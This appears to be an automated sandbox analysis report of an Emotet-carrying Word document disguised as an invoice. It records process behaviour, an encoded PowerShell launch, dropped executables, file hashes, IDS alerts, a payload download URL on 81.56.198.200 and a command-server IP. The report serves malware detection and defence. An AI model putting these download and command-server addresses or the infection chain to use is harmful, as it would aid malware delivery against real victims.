File name: Factura-2019-090005-01-02-2019.doc

Full analysis: https://app.any.run/tasks/d6886e6e-0ded-46a1-8750-185a13379300
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 18, 2019, 13:23:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: 4FB302748C12C77CE2EACF26DCE55A42
SHA1: CDA17A140E0E98047FE34D822238C56D46D1DC67
SHA256: D53F9FD700393C6FEB2C80B82A057B139BDCB99DE6C4BCDDCC718AF502D53701
SSDEEP: 3072:ru2/0IzRJCT8P7Zm4codz/u5iW8EM/FWt:y2/3JdPtiJQ/Fa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 211.exe (PID: 3720)
      • 211.exe (PID: 2604)
      • wabmetagen.exe (PID: 3508)
      • wabmetagen.exe (PID: 2752)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3364)
    • Downloads executable files from IP

      • powershell.exe (PID: 3364)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3508)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3364)
      • 211.exe (PID: 2604)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3492)
    • Creates files in the user directory

      • powershell.exe (PID: 3364)
    • Application launched itself

      • 211.exe (PID: 3720)
    • Starts itself from another location

      • 211.exe (PID: 2604)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3172)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:02:15 12:35:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:02:15 12:35:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 2
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 13
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 003B0670
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: l52___32
WordDocumentDocSuppDataBinData: (Binary data 101228 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsColormruExt: edit
WordDocumentShapeDefaultsShapedefaultsColormruColors: #00aeea
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentBgPictBackgroundBgcolor: #00AEEA
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDisplayBackgroundShape: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00005EB7
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00B62094
WordDocumentBodySectPRRsidRPr: 00743F44
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://h0_627_.S2097_20.Z695_953
WordDocumentBodySectPRPictBinData: (base64-encoded JPEG image data)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:161.25pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://h0_627_.S2097_20.Z695_953
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 00005EB7
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
Total processes: 39
Monitored processes: 7
Malicious processes: 4
Suspicious processes: 0

Behavior graph

[Behavior graph. Edge labels: start, drop and start, drop and start. Process nodes: msoxmled.exe (no specs), winword.exe (no specs), powershell.exe, 211.exe (no specs), 211.exe, #EMOTET wabmetagen.exe (no specs), wabmetagen.exe]

Process information

PID: 3492
CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml"
Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 0
Version: 14.0.4750.1000

PID: 3172
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3364
CMD: powershell -e […]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3720
CMD: "C:\Users\admin\211.exe"
Path: C:\Users\admin\211.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporatio
Integrity Level: MEDIUM
Description: EFS UI Application
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-

PID: 2604
CMD: "C:\Users\admin\211.exe"
Path: C:\Users\admin\211.exe
Parent process: 211.exe
User: admin
Company: Microsoft Corporatio
Integrity Level: MEDIUM
Description: EFS UI Application
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-

PID: 3508
CMD: "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process: 211.exe
User: admin
Company: Microsoft Corporatio
Integrity Level: MEDIUM
Description: EFS UI Application
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-

PID: 2752
CMD: "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process: wabmetagen.exe
User: admin
Company: Microsoft Corporatio
Integrity Level: MEDIUM
Description: EFS UI Application
Version: 6.1.7600.16385 (win7_rtm.090713-
Total events: 2 042
Read events: 1 628
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 2

Dropped files

PID: 3172
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR8E6B.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 3172
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70209946.Z695_953
Type: -
MD5: -
SHA256: -

PID: 3364
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HEK5KKFNX12HXRTQBWUT.temp
Type: -
MD5: -
SHA256: -

PID: 3364
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 3364
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a52.TMP
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 3172
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$ctura-2019-090005-01-02-2019.doc.xml
Type: pgc
MD5: 2F39D3E433B30143246B5C86D4BD6FC7
SHA256: D2DEC28C69BDA910E017366283434F29AA61E3912C1549EEE5DA9195AA99DC34

PID: 3364
Process: powershell.exe
Filename: C:\Users\admin\211.exe
Type: executable
MD5: 8D3D095610DA17BFC3C799D415072054
SHA256: E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324

PID: 3172
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: BCA7725C8CB9C8D63EC166E879124B21
SHA256: 05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73

PID: 2604
Process: 211.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5: 8D3D095610DA17BFC3C799D415072054
SHA256: E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324
HTTP(S) requests: 3
TCP/UDP connections: 2
DNS requests: 0
Threats: 0

HTTP requests

PID: 2752
Process: wabmetagen.exe
Method: GET
HTTP Code: -
IP: 88.225.226.91:443
URL: http://88.225.226.91:443/
CN: TR
Type: -
Size: -
Reputation: malicious

PID: 3364
Process: powershell.exe
Method: GET
HTTP Code: 200
IP: 81.56.198.200:80
URL: http://81.56.198.200/MrMAFWOk9/
CN: FR
Type: executable
Size: 152 Kb
Reputation: suspicious

PID: 3364
Process: powershell.exe
Method: GET
HTTP Code: 301
IP: 81.56.198.200:80
URL: http://81.56.198.200/MrMAFWOk9
CN: FR
Type: html
Size: 239 b
Reputation: suspicious

Connections

PID: 3364
Process: powershell.exe
IP: 81.56.198.200:80
Domain: -
ASN: Free SAS
CN: FR
Reputation: suspicious

PID: 2752
Process: wabmetagen.exe
IP: 88.225.226.91:443
Domain: -
ASN: Turk Telekom
CN: TR
Reputation: malicious

DNS requests

No data

Threats

PID: 3364
Process: powershell.exe
Class: Potential Corporate Privacy Violation
Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID: 3364
Process: powershell.exe
Class: Potentially Bad Traffic
Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

PID: 3364
Process: powershell.exe
Class: Potentially Bad Traffic
Message: ET INFO SUSPICIOUS Dotted Quad Host MZ Response

PID: 3364
Process: powershell.exe
Class: Misc activity
Message: ET INFO EXE - Served Attached HTTP
No debug info